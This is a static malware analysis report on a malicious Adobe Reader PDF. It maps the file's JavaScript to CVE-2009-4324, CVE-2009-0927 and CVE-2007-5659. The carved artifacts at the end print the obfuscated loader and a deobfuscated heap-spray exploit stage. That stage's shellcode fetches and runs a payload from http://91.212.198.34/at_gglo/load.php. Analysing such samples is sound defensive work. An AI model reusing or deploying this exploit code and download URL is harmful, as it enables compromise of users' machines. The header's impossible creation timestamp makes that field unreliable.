Malicious PDF — malware analysis report

Static analysis result for SHA-256 83d16249b0dab783…

MALICIOUS

PDF

5.7 KB Created: 2009-01-35 62:12:26 Authoring application: Adobe
MD5: 587d5bc88a6fa1a2ba9e5901b2f6e836 SHA-1: 78a59b32204657054986204701bceba825905e23 SHA-256: 83d16249b0dab783035d34b1978f6ddc1aae1c098c1b303b91ae9521222ba8bc
590 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known vulnerabilities in Adobe Reader, specifically CVE-2009-4324, CVE-2009-0927, and CVE-2007-5659. The JavaScript is designed to download and execute a second-stage payload from the URLs http://91.212.198.34/at_gglo/load.php?spl=pdf_new and http://91.212.198.34/at_gglo/load.php?spl=pdf_pack. The presence of exploit clusters and shellcode download URLs strongly indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.212.198.34/at_gglo/load.php?spl=pdf_new Referenced by PDF JavaScript
    • http://91.212.198.34/at_gglo/load.php?spl=pdf_packReferenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0032_000.js
033c92df9f50ee99c879f42bb96a0bdfd5d0b8c05624aa4f808ad7fc75b1d1f8		 pdf-javascript-stream PDF /JS object 32 at offset 0x3C1 156 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aljbpqLXXfM = 'jOwMTjTcHJN.re';
var ktop = 'r bvb = ev';
var lGq4ChMbh5b = 'gjfj o30444444';


eval('va'+ktop+'al;')
eval('var z = un'+'esca'+'pe;');
javascript_obj0034_001.js
d936163ecd6abb56525d694582a1a0ffdf11ffa5b0ce0fbc5014d4bdc7e6dd0e		 pdf-javascript-stream PDF /JS object 34 at offset 0x492 104 bytes
Preview script
First 1,000 lines of the extracted script
var ru68np5m70Y = 'plac'+'e'+'(/';

var HkOg7wDmIj3 = '%';

var agvhgavsh = '/g,HkOg7wDmIj3)';
javascript_obj0036_002.js
74ae1173d76a933e8969f7b6fa2a365df351cf586b7e8048b8708e67181cd0ae		 pdf-javascript-stream PDF /JS object 36 at offset 0xE3 110 bytes
Preview script
First 1,000 lines of the extracted script
bvb('var bnEq0qYERH9 = ev'+'al;');
bnEq0qYERH9('var jOwMTjTcHJN = this.info'+z("%2e%46%61%6b")+'erss;');
javascript_obj0038_003.js
335649ca23de4fbe06aa2b840fbea3abb7b07dc1c5fb76eddbad1f52cd0e2f2e		 pdf-javascript-stream PDF /JS object 38 at offset 0x13D4 130 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var lkaa = aljbpqLXXfM + ru68np5m70Y +lGq4ChMbh5b+ agvhgavsh;
var xxx = bnEq0qYERH9(lkaa);
var czUcDGvwJ5j = z(unescape(xxx));
legacy_pdfkit_stage_000.js
cda1c83c46b664ab69f48b74080e5ca11fe1aca3a39fd9b498faefcc75b30c4e		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x569 6435 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;} function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32%u3931%u2E38%u3433%u612F%u5F74%u6767%u6F6C%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e) {}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32%u3931%u2E38%u3433%u612F%u5F74%u6767%u6F6C%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);} function collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32%u3931%u2E38%u343
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.